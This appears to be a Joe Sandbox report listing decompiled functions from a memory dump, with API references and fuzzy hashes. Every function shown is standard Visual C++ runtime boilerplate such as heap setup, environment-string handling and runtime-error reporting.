Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: _lock$AllocCountCriticalCurrentEncodeInitializePointerSectionSleepSpinThreadValue_initp_misc_winsig
String ID:
API String ID: 3311150041-0
Opcode ID: 1828b3160a7fc45fe0aa8c8d66e41bf4a912bb4e31d292ea434c521c34d7a7ee
Instruction ID: f1fc182e917d9a6f5da5a43d94571f317ad44158d1f77f8adcb6fb062a6a553d
Opcode Fuzzy Hash: 1828b3160a7fc45fe0aa8c8d66e41bf4a912bb4e31d292ea434c521c34d7a7ee
Instruction Fuzzy Hash: C5018120E0960346F7D67FB59816279E2919F44771FD44730D42DA52D5EF2CF4858632

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF26A00 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00007FF7CEF26A16
GetVersion.KERNEL32 ref: 00007FF7CEF26A28
HeapSetInformation.KERNEL32 ref: 00007FF7CEF26A46

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: Heap$CreateInformationVersion
String ID:
API String ID: 3563531100-0
Opcode ID: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
Instruction ID: cba26b23317ad3dd60842b9d941cf676ca2649a8f41900620e48fe14800dd36a
Opcode Fuzzy Hash: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
Instruction Fuzzy Hash: E4E09235E29A4283FBC4BF10A809779A250FF98760FC15034E94F22794DF3CE0458B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF26634 Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00007FF77FF7CEF26634(void* __edi, intOrPtr* __rax, long long __rbx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				WCHAR* _t7;
				void* _t14;
				intOrPtr* _t22;
				intOrPtr* _t23;
				intOrPtr* _t32;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t7 = GetEnvironmentStringsW();
				_t32 = __rax;
				if (__rax == 0) goto 0xcef266a4;
				if ( *__rax == 0) goto 0xcef2666f;
				_t22 = __rax + 2;
				if ( *_t22 != 0) goto 0xcef2665d;
				_t23 = _t22 + 2;
				if ( *_t23 != 0) goto 0xcef2665d;
				_t37 = _t7 - __edi + 2;
				E00007FF77FF7CEF274A0(__rbx, _t7 - __edi + 2, __rax, __rsi); // executed
				if (_t23 == 0) goto 0xcef26698;
				E00007FF77FF7CEF27640(_t14, _t23, _t23, _t32, _t37);
				return FreeEnvironmentStringsW(??);
			}

0x7ff7cef26634
0x7ff7cef26639
0x7ff7cef2663e
0x7ff7cef26648
0x7ff7cef26650
0x7ff7cef26656
0x7ff7cef2665b
0x7ff7cef2665d
0x7ff7cef26664
0x7ff7cef26666
0x7ff7cef2666d
0x7ff7cef26674
0x7ff7cef2667a
0x7ff7cef26685
0x7ff7cef26690
0x7ff7cef266b8

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,00007FF7CEF2449D), ref: 00007FF7CEF26648
FreeEnvironmentStringsW.KERNEL32(?,?,?,00007FF7CEF2449D), ref: 00007FF7CEF2669B

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: c9ffd7a6a926fd1b1184d0830866c1af29c1caadf3e0be99496d7649fc07dc5a
Instruction ID: a5e06b09ff576c64d065893b65d30fc32ae37c95202de33f179124645b709490
Opcode Fuzzy Hash: c9ffd7a6a926fd1b1184d0830866c1af29c1caadf3e0be99496d7649fc07dc5a
Instruction Fuzzy Hash: D2018F52E0974285EEA0BF56A451029AAA0EF48BE0F8A4430DA4D1BB86EF2CE4808710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF25880 Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00007FF77FF7CEF25880(intOrPtr* __rax, void* __rbx, void* __rdx, long long _a8) {
				void* _t3;
				void* _t9;
				long long* _t14;
				long long _t17;
				void* _t28;

				E00007FF77FF7CEF25114(); // executed
				E00007FF77FF7CEF2831C(E00007FF77FF7CEF28580(E00007FF77FF7CEF28588(E00007FF77FF7CEF25538(E00007FF77FF7CEF28590(_t3, __rax), __rax), __rax), __rax), __rax);
				_pop(_t17);
				goto 0xcef282fc;
				asm("int3");
				if (__rax - __rdx >= 0) goto 0xcef258f6;
				_a8 = _t17;
				_t14 =  *((intOrPtr*)(__rax));
				if (_t14 == 0) goto 0xcef258e3;
				_t9 =  *_t14(_t28);
				if (__rax + 8 - __rdx < 0) goto 0xcef258d9;
				return _t9;
			}

0x7ff7cef25886
0x7ff7cef258b1
0x7ff7cef258bd
0x7ff7cef258be
0x7ff7cef258c3
0x7ff7cef258c7
0x7ff7cef258c9
0x7ff7cef258d9
0x7ff7cef258df
0x7ff7cef258e1
0x7ff7cef258ea
0x7ff7cef258f6

APIs

_initp_misc_winsig.LIBCMT ref: 00007FF7CEF258B1
EncodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CEF28307

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: EncodePointer_initp_misc_winsig
String ID:
API String ID: 2349294043-0
Opcode ID: bfa8839ea546c11a2e1db89dec259032d6760ab63d3fad3f8e77d06c4ae8978b
Instruction ID: ff259853ea7976e03d54b967cb8baef973e7848a8071ffeb49c9830af8636233
Opcode Fuzzy Hash: bfa8839ea546c11a2e1db89dec259032d6760ab63d3fad3f8e77d06c4ae8978b
Instruction Fuzzy Hash: 18E07D10E5A68B80F989BF726C6707892515F9AB70FC81431D90F2A392DF2CE5965770

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF274A0 Relevance: 2.5, APIs: 2, Instructions: 35
sleepCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7CEF274A0(long long __rbx, void* __rcx, long long __rdi, long long __rsi) {
				void* _t10;
				intOrPtr _t12;
				void* _t21;
				long long _t33;
				void* _t35;
				int _t38;

				_t21 = _t35;
				 *((long long*)(_t21 + 8)) = __rbx;
				 *((long long*)(_t21 + 0x10)) = _t33;
				 *((long long*)(_t21 + 0x18)) = __rsi;
				 *((long long*)(_t21 + 0x20)) = __rdi;
				_t12 =  *0xcef30020; // 0x0
				r12d = r12d | 0xffffffff;
				_t10 = malloc(_t38); // executed
				if (_t21 != 0) goto 0xcef27500;
				if (_t12 == 0) goto 0xcef27500;
				Sleep(??);
				_t5 = _t33 + 0x3e8; // 0x3e8
				r11d = _t5;
				_t16 =  >  ? r12d : r11d;
				_t20 = ( >  ? r12d : r11d) - r12d;
				if (( >  ? r12d : r11d) != r12d) goto 0xcef274c8;
				return _t10;
			}

0x7ff7cef274a0
0x7ff7cef274a3
0x7ff7cef274a7
0x7ff7cef274ab
0x7ff7cef274af
0x7ff7cef274b9
0x7ff7cef274c4
0x7ff7cef274cb
0x7ff7cef274d6
0x7ff7cef274da
0x7ff7cef274de
0x7ff7cef274ea
0x7ff7cef274ea
0x7ff7cef274f7
0x7ff7cef274fb
0x7ff7cef274fe
0x7ff7cef2751d

APIs

malloc.LIBCMT ref: 00007FF7CEF274CB

Part of subcall function 00007FF7CEF28CD4: _FF_MSGBANNER.LIBCMT ref: 00007FF7CEF28D04
Part of subcall function 00007FF7CEF28CD4: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7CEF274D0,?,?,?,00007FF7CEF27395,?,?,?,00007FF7CEF2743F), ref: 00007FF7CEF28D29
Part of subcall function 00007FF7CEF28CD4: _callnewh.LIBCMT ref: 00007FF7CEF28D42
Part of subcall function 00007FF7CEF28CD4: _errno.LIBCMT ref: 00007FF7CEF28D4D
Part of subcall function 00007FF7CEF28CD4: _errno.LIBCMT ref: 00007FF7CEF28D58

Sleep.KERNEL32(?,?,?,00007FF7CEF27395,?,?,?,00007FF7CEF2743F), ref: 00007FF7CEF274DE

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: _errno$AllocateHeapSleep_callnewhmalloc
String ID:
API String ID: 3606348469-0
Opcode ID: 09bcfd121daf6e22e37d43c1392b18068930b22491ba73bf7725222622581c4f
Instruction ID: 61344b148aae002400d34169f2c2d5f4c281c650c7c1dea0a562d77e9616bce5
Opcode Fuzzy Hash: 09bcfd121daf6e22e37d43c1392b18068930b22491ba73bf7725222622581c4f
Instruction Fuzzy Hash: C301D632A14B8586E691AF16A400029F7A5FBC8FA0F990135EE4D27781DF3CF841C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF28734 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(?,?,?,00007FF7CEF25967,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF2874D

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 21ca87f40e7d75410fcf8480b8a9411f1a80792b9d8a82d103126c1c06f9e053
Instruction ID: 8972cd883f78d6fa1f05e4cce9314d1d2cf8a11bd35ce97dc709e5941efb4f67
Opcode Fuzzy Hash: 21ca87f40e7d75410fcf8480b8a9411f1a80792b9d8a82d103126c1c06f9e053
Instruction Fuzzy Hash: 97D01222B54E45D2EB419F11F451268A260EB847A4F998030DA4C06214DF3CC4958710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF27520 Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00007FF77FF7CEF27520(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t10;
				void* _t11;
				void* _t17;
				void* _t20;
				long long _t29;
				void* _t37;
				void* _t40;
				long _t41;

				_t29 = __rdi;
				_t20 = _t37;
				 *((long long*)(_t20 + 8)) = __rbx;
				 *((long long*)(_t20 + 0x10)) = __rbp;
				 *((long long*)(_t20 + 0x18)) = __rsi;
				 *((long long*)(_t20 + 0x20)) = __rdi;
				r12d = r12d | 0xffffffff;
				r8d = 0;
				_t11 = E00007FF77FF7CEF28F3C(_t10, __rbx, __rcx, __rdx, _t40); // executed
				if (_t20 != 0) goto 0xcef27585;
				_t17 =  *0xcef30020 - _t11; // 0x0
				if (_t17 <= 0) goto 0xcef27585;
				Sleep(_t41);
				_t5 = _t29 + 0x3e8; // 0x3e8
				r11d = _t5;
				_t15 =  >  ? r12d : r11d;
				_t19 = ( >  ? r12d : r11d) - r12d;
				if (( >  ? r12d : r11d) != r12d) goto 0xcef27545;
				return _t11;
			}

0x7ff7cef27520
0x7ff7cef27520
0x7ff7cef27523
0x7ff7cef27527
0x7ff7cef2752b
0x7ff7cef2752f
0x7ff7cef27541
0x7ff7cef27545
0x7ff7cef2754e
0x7ff7cef27559
0x7ff7cef2755b
0x7ff7cef27561
0x7ff7cef27565
0x7ff7cef2756b
0x7ff7cef2756b
0x7ff7cef2757c
0x7ff7cef27580
0x7ff7cef27583
0x7ff7cef275a2

APIs

Part of subcall function 00007FF7CEF28F3C: _errno.LIBCMT ref: 00007FF7CEF28F5F

Sleep.KERNEL32(?,?,?,00007FF7CEF25233,?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5), ref: 00007FF7CEF27565

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: Sleep_errno
String ID:
API String ID: 1068366078-0
Opcode ID: 27c233027f4b1cc762992e46889d80dca534030d028143b08ddf39f412184f35
Instruction ID: 5d7cb1d774a574cbb2b57d757349939822e5ed94f7327b591a4ec52b10ab141a
Opcode Fuzzy Hash: 27c233027f4b1cc762992e46889d80dca534030d028143b08ddf39f412184f35
Instruction Fuzzy Hash: 9201DB32A24B9586E784AF269401029F7A6F7C8FE0F890131DE5D17790CF3CE851C704

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7CEF25C00 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159
fileCOMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 62%

			E00007FF77FF7CEF25C00(void* __ecx, void* __eflags, long long __rbx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				void* _v24;
				signed int _v40;
				intOrPtr _v53;
				char _v552;
				void* _v568;
				long long _v584;
				void* __rdi;
				void* _t33;
				void* _t39;
				signed long long _t83;
				signed long long _t84;
				signed long long _t85;
				signed long long _t88;
				signed long long _t90;
				void* _t105;
				void* _t112;
				void* _t120;
				void* _t131;
				void* _t134;

				_t115 = __rsi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t83 =  *0xcef2eb60; // 0xd44e0b4a63bf
				_t84 = _t83 ^ _t120 - 0x00000250;
				_v40 = _t84;
				E00007FF77FF7CEF25BD4(__ecx);
				_t90 = _t84;
				if (_t84 == 0) goto 0xcef25e30;
				_t5 = _t115 + 3; // 0x3
				if (E00007FF77FF7CEF28C1C(_t5, _t84) == 1) goto 0xcef25dc8;
				_t6 = _t115 + 3; // 0x3
				if (E00007FF77FF7CEF28C1C(_t6, _t84) != 0) goto 0xcef25c6c;
				if ( *0xcef2e000 == 1) goto 0xcef25dc8;
				if (__ecx == 0xfc) goto 0xcef25e30;
				r12d = 0x314;
				if (E00007FF77FF7CEF28BB0(_t84, 0xcef2f5a0, _t105, L"Runtime Error!\n\nProgram: ") != 0) goto 0xcef25db5;
				r8d = 0x104;
				 *0xcef2f7da = 0;
				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0xcef25cf1;
				if (E00007FF77FF7CEF28BB0(_t84, 0xcef2f5d2, 0xcef2f5d2, L"<program name unknown>") == 0) goto 0xcef25cf1;
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FF77FF7CEF2568C();
				asm("int3");
				_t33 = E00007FF77FF7CEF28B94(_t32, 0xcef2f5d2);
				_t85 = _t84 + 1;
				if (_t85 - 0x3c <= 0) goto 0xcef25d49;
				E00007FF77FF7CEF28B94(_t33, 0xcef2f5d2);
				r9d = 3;
				_t10 = _t85 * 2; // -68
				_t88 = 0xcef2f5a0 + _t10 - 0x44 - 0xcef2f5d2 >> 1;
				if (E00007FF77FF7CEF28AC4(_t88, 0xcef2f5a0 + _t10 - 0x44, _t112 - _t88, L"...", _t131) == 0) goto 0xcef25d49;
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FF77FF7CEF2568C();
				asm("int3");
				if (E00007FF77FF7CEF28A3C(_t88, 0xcef2f5a0, _t134, L"\n\n") != 0) goto 0xcef25da0;
				if (E00007FF77FF7CEF28A3C(_t88, 0xcef2f5a0, _t134, _t90) != 0) goto 0xcef25d8b;
				r8d = 0x12010;
				E00007FF77FF7CEF28834(0xcef2f5a0, L"Microsoft Visual C++ Runtime Library", _t131);
				goto 0xcef25e30;
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FF77FF7CEF2568C();
				asm("int3");
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FF77FF7CEF2568C();
				asm("int3");
				r9d = 0;
				r8d = 0;
				_v584 = __rsi;
				E00007FF77FF7CEF2568C();
				asm("int3");
				_t39 = GetStdHandle(??);
				if (_t88 == 0) goto 0xcef25e30;
				if (_t88 == 0xffffffff) goto 0xcef25e30;
				_t16 =  &_v552; // 0x354
				 *_t16 =  *_t90;
				if ( *_t90 == 0) goto 0xcef25e03;
				if (1 - 0x1f4 < 0) goto 0xcef25de8;
				_v53 = sil;
				E00007FF77FF7CEF28080(_t39,  &_v552);
				_v584 = __rsi;
				WriteFile(??, ??, ??, ??, ??);
				return E00007FF77FF7CEF271F0( *_t90, _t90 + 2, _v40 ^ _t120 - 0x00000250, _t88, __rsi);
			}

0x7ff7cef25c00
0x7ff7cef25c00
0x7ff7cef25c05
0x7ff7cef25c0a
0x7ff7cef25c1b
0x7ff7cef25c22
0x7ff7cef25c25
0x7ff7cef25c2f
0x7ff7cef25c36
0x7ff7cef25c3c
0x7ff7cef25c42
0x7ff7cef25c4d
0x7ff7cef25c53
0x7ff7cef25c5d
0x7ff7cef25c66
0x7ff7cef25c72
0x7ff7cef25c7f
0x7ff7cef25c9b
0x7ff7cef25ca8
0x7ff7cef25cae
0x7ff7cef25cc5
0x7ff7cef25cda
0x7ff7cef25cdc
0x7ff7cef25cdf
0x7ff7cef25ce6
0x7ff7cef25ceb
0x7ff7cef25cf0
0x7ff7cef25cf4
0x7ff7cef25cf9
0x7ff7cef25d00
0x7ff7cef25d05
0x7ff7cef25d11
0x7ff7cef25d17
0x7ff7cef25d22
0x7ff7cef25d32
0x7ff7cef25d34
0x7ff7cef25d37
0x7ff7cef25d3e
0x7ff7cef25d43
0x7ff7cef25d48
0x7ff7cef25d5d
0x7ff7cef25d6f
0x7ff7cef25d78
0x7ff7cef25d81
0x7ff7cef25d86
0x7ff7cef25d8b
0x7ff7cef25d8e
0x7ff7cef25d95
0x7ff7cef25d9a
0x7ff7cef25d9f
0x7ff7cef25da0
0x7ff7cef25da3
0x7ff7cef25daa
0x7ff7cef25daf
0x7ff7cef25db4
0x7ff7cef25db5
0x7ff7cef25db8
0x7ff7cef25dbd
0x7ff7cef25dc2
0x7ff7cef25dc7
0x7ff7cef25dcd
0x7ff7cef25dd9
0x7ff7cef25ddf
0x7ff7cef25de3
0x7ff7cef25dea
0x7ff7cef25df0
0x7ff7cef25e01
0x7ff7cef25e08
0x7ff7cef25e10
0x7ff7cef25e25
0x7ff7cef25e2a
0x7ff7cef25e5c

APIs

_set_error_mode.LIBCMT ref: 00007FF7CEF25C45
_set_error_mode.LIBCMT ref: 00007FF7CEF25C56
GetModuleFileNameW.KERNEL32 ref: 00007FF7CEF25CB8

Part of subcall function 00007FF7CEF2568C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7CEF2572E), ref: 00007FF7CEF256A4

GetStdHandle.KERNEL32 ref: 00007FF7CEF25DCD
WriteFile.KERNEL32 ref: 00007FF7CEF25E2A

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00007FF7CEF25D71
<program name unknown>, xrefs: 00007FF7CEF25CC7
..., xrefs: 00007FF7CEF25D0A
Runtime Error!Program: , xrefs: 00007FF7CEF25C85

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 2183313154-4022980321
Opcode ID: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
Instruction ID: c0aaf02259c8895d525a96cfcdfd676e8f6601d016283dd9540069342965d93e
Opcode Fuzzy Hash: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
Instruction Fuzzy Hash: 87510431B1C68242FBE5FF21A4156BAA291FF887A4FC44135EE4D27B85CF3CE1058621

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF271F0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7CEF28E03
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7CEF28E22
RtlVirtualUnwind.KERNEL32 ref: 00007FF7CEF28E6E
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CEF25673), ref: 00007FF7CEF28EE0
SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CEF25673), ref: 00007FF7CEF28EF8
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CEF25673), ref: 00007FF7CEF28F05
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CEF25673), ref: 00007FF7CEF28F1E
TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CEF25673), ref: 00007FF7CEF28F2C

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
Instruction ID: 85c02eca76c1284144cd96997de25771bf2c4b74eb34edfb7f60ffbc58492863
Opcode Fuzzy Hash: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
Instruction Fuzzy Hash: 7231B235908F8686EB90AF55F84436AB3A0FB84764FD00536DA8D677A5DF7CE054CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF25540 Relevance: 9.1, APIs: 6, Instructions: 80
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E00007FF77FF7CEF25540(signed int __ecx, signed int __edx, long long __rbx, long long __rsi) {
				void* __rdi;
				void* _t37;
				void* _t38;
				int _t40;
				signed long long _t61;
				long long _t63;
				void* _t78;
				_Unknown_base(*)()* _t81;
				void* _t85;
				void* _t86;
				void* _t88;
				signed long long _t89;
				void* _t91;
				struct _EXCEPTION_POINTERS* _t96;

				 *((long long*)(_t88 + 0x10)) = __rbx;
				 *((long long*)(_t88 + 0x18)) = __rsi;
				_t86 = _t88 - 0x4f0;
				_t89 = _t88 - 0x5f0;
				_t61 =  *0xcef2eb60; // 0xd44e0b4a63bf
				 *(_t86 + 0x4e0) = _t61 ^ _t89;
				if (__ecx == 0xffffffff) goto 0xcef2557f;
				_t38 = E00007FF77FF7CEF27FA4(_t37);
				 *(_t89 + 0x70) =  *(_t89 + 0x70) & 0x00000000;
				r8d = 0x94;
				E00007FF77FF7CEF26B20(_t38, __ecx, 0, _t89 + 0x74, _t78, _t91);
				_t63 = _t86 + 0x10;
				 *((long long*)(_t89 + 0x48)) = _t89 + 0x70;
				 *((long long*)(_t89 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				0xcef29158();
				if (_t63 == 0) goto 0xcef25606;
				 *(_t89 + 0x38) =  *(_t89 + 0x38) & 0x00000000;
				 *((long long*)(_t89 + 0x30)) = _t89 + 0x60;
				 *((long long*)(_t89 + 0x28)) = _t89 + 0x58;
				 *((long long*)(_t89 + 0x20)) = _t86 + 0x10;
				0xcef29152();
				goto 0xcef25622;
				 *((long long*)(_t86 + 0x108)) =  *((intOrPtr*)(_t86 + 0x508));
				 *((long long*)(_t86 + 0xa8)) = _t86 + 0x508;
				 *(_t89 + 0x70) = __edx;
				 *((intOrPtr*)(_t89 + 0x74)) = r8d;
				 *((long long*)(_t86 - 0x80)) =  *((intOrPtr*)(_t86 + 0x508));
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t81, _t85);
				if (UnhandledExceptionFilter(_t96) != 0) goto 0xcef25664;
				if (_t40 != 0) goto 0xcef25664;
				if (__ecx == 0xffffffff) goto 0xcef25664;
				E00007FF77FF7CEF27FA4(_t42);
				return E00007FF77FF7CEF271F0(__ecx, __rbx,  *(_t86 + 0x4e0) ^ _t89, _t81, __rsi);
			}

0x7ff7cef25540
0x7ff7cef25545
0x7ff7cef2554e
0x7ff7cef25556
0x7ff7cef2555d
0x7ff7cef25567
0x7ff7cef25578
0x7ff7cef2557a
0x7ff7cef2557f
0x7ff7cef2558b
0x7ff7cef25591
0x7ff7cef2559b
0x7ff7cef255a3
0x7ff7cef255a8
0x7ff7cef255ad
